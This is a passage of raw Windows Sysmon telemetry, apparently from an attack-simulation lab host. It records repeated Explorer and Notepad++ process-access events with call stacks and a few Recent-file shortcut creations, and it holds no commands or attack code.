Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 10341000x80000000000000001047083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=426FCF24E244603549F387735AB7C1DD,SHA256=30719EDC1D4DDCD1799555569965D8730BE0CEB5C8C9AA004BBD76FC6660DA47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.117{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 10341000x80000000000000001047070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.101{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.101{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.101{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3ca38e|C:\Windows\System32\windows.storage.dll+3c603f|C:\Windows\System32\windows.storage.dll+3c7180|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c78d8|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d|C:\Windows\System32\USER32.dll+23a42|C:\Windows\System32\USER32.dll+1f839|C:\Windows\System32\USER32.dll+1f7b6 10341000x80000000000000001047062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows